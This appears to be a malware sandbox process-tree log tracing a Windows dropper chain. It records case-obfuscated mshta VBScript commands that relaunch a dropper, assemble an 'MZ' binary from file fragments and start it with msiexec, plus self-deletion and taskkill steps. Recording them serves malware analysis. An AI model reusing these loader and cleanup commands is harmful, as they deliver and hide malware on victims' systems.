C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPT: cLOse( CREATeOBjecT("wsCRipT.sHeLl" ). RUN ( "CmD.Exe /C cOpY /y ""C:\Users\Admin\AppData\Roaming\616927.exe"" ..\2XWllNGTIWAqr6.Exe &&START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1& IF """"=="""" for %Q IN ( ""C:\Users\Admin\AppData\Roaming\616927.exe"" ) do taskkill -f -iM ""%~nxQ"" " , 0 , TRUe ) )5⤵PID:5132
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOpY /y "C:\Users\Admin\AppData\Roaming\616927.exe" ..\2XWllNGTIWAqr6.Exe&&START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1&IF ""=="" for %Q IN ( "C:\Users\Admin\AppData\Roaming\616927.exe" ) do taskkill -f -iM "%~nxQ"6⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q17⤵PID:5104
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPT: cLOse( CREATeOBjecT("wsCRipT.sHeLl" ). RUN ( "CmD.Exe /C cOpY /y ""C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe"" ..\2XWllNGTIWAqr6.Exe &&START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1& IF ""-PX7vthTn~HNSZZcPFYIS_BIoryr5Q1""=="""" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe"" ) do taskkill -f -iM ""%~nxQ"" " , 0 , TRUe ) )8⤵PID:4376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cOpY /y "C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe" ..\2XWllNGTIWAqr6.Exe&&START ..\2XWllNGTIWaqr6.exE -PX7vthTn~HNSZZcPFYIS_BIoryr5Q1&IF "-PX7vthTn~HNSZZcPFYIS_BIoryr5Q1"=="" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\2XWllNGTIWAqr6.Exe" ) do taskkill -f -iM "%~nxQ"9⤵PID:5660
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipT:ClosE ( crEatEOBJeCT ( "WscRiPt.shElL").RUN ( "CMD /Q /C echo | seT /P = ""MZ"" > OHSPoRD.K & CopY /B /y oHSPoRD.K+KQVI.2G+ BVW~.0 +uGQKDE~.WP8 + 5lIdq.F +XIDzHw8.U1 + ZYGVW.5Nt ..\_PYvYm.r43 & del /q *&stArt msiexec /Y ..\_pyvYM.R43 " ,0 ,True ) )8⤵PID:3672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C echo | seT /P = "MZ" > OHSPoRD.K& CopY /B /y oHSPoRD.K+KQVI.2G+BVW~.0 +uGQKDE~.WP8 + 5lIdq.F +XIDzHw8.U1 + ZYGVW.5Nt ..\_PYvYm.r43& del /q *&stArt msiexec /Y ..\_pyvYM.R439⤵PID:5240
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>OHSPoRD.K"10⤵PID:3712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "10⤵PID:5820
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "616927.exe"7⤵
- Kills process with taskkill
PID:1276
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\244812.exe"C:\Users\Admin\AppData\Roaming\244812.exe"4⤵PID:4380
-
-
-
C:\Users\Admin\AppData\Roaming\6546503.exe"C:\Users\Admin\AppData\Roaming\6546503.exe"3⤵PID:5036
-
-
-
C:\Users\Admin\Pictures\Adobe Films\apWqJYSmGjk8UxEqOq7fn4FR.exe"C:\Users\Admin\Pictures\Adobe Films\apWqJYSmGjk8UxEqOq7fn4FR.exe"2⤵PID:1076
-
-
C:\Users\Admin\Pictures\Adobe Films\cNkUYp1yjpTvh8TnOXngE_HS.exe"C:\Users\Admin\Pictures\Adobe Films\cNkUYp1yjpTvh8TnOXngE_HS.exe"2⤵PID:908
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\cNkUYp1yjpTvh8TnOXngE_HS.exe" & exit3⤵PID:1344
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
PID:1900
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fe7Wczal6V9DTt2tHRy4Y_Iq.exe"C:\Users\Admin\Pictures\Adobe Films\fe7Wczal6V9DTt2tHRy4Y_Iq.exe"2⤵PID:836
-
-
C:\Users\Admin\Pictures\Adobe Films\IBgU1b2L6aQBlCs8D6dK4y3y.exe"C:\Users\Admin\Pictures\Adobe Films\IBgU1b2L6aQBlCs8D6dK4y3y.exe"2⤵PID:1056
-
-
C:\Users\Admin\Pictures\Adobe Films\C2mgxm2dWelllqpl7jm1JCvx.exe"C:\Users\Admin\Pictures\Adobe Films\C2mgxm2dWelllqpl7jm1JCvx.exe"2⤵PID:1300
-
-
C:\Users\Admin\AppData\Local\Temp\is-PFJ61.tmp\C2mgxm2dWelllqpl7jm1JCvx.tmp"C:\Users\Admin\AppData\Local\Temp\is-PFJ61.tmp\C2mgxm2dWelllqpl7jm1JCvx.tmp" /SL5="$301EE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\C2mgxm2dWelllqpl7jm1JCvx.exe"1⤵PID:3728
-
C:\Users\Admin\AppData\Local\Temp\is-VMGO4.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-VMGO4.tmp\lakazet.exe" /S /UID=27092⤵PID:644
-
C:\Users\Admin\AppData\Local\Temp\95-8a314-1a6-00982-e4c6e048561ed\Divaeqative.exe"C:\Users\Admin\AppData\Local\Temp\95-8a314-1a6-00982-e4c6e048561ed\Divaeqative.exe"3⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\c4-e0ae1-b6a-024bc-84a6c9e26e5fc\Panoquguqae.exe"C:\Users\Admin\AppData\Local\Temp\c4-e0ae1-b6a-024bc-84a6c9e26e5fc\Panoquguqae.exe"3⤵PID:5336
-
-
C:\Program Files\Microsoft Office 15\STKETHRFQD\foldershare.exe"C:\Program Files\Microsoft Office 15\STKETHRFQD\foldershare.exe" /VERYSILENT3⤵PID:3212
-
-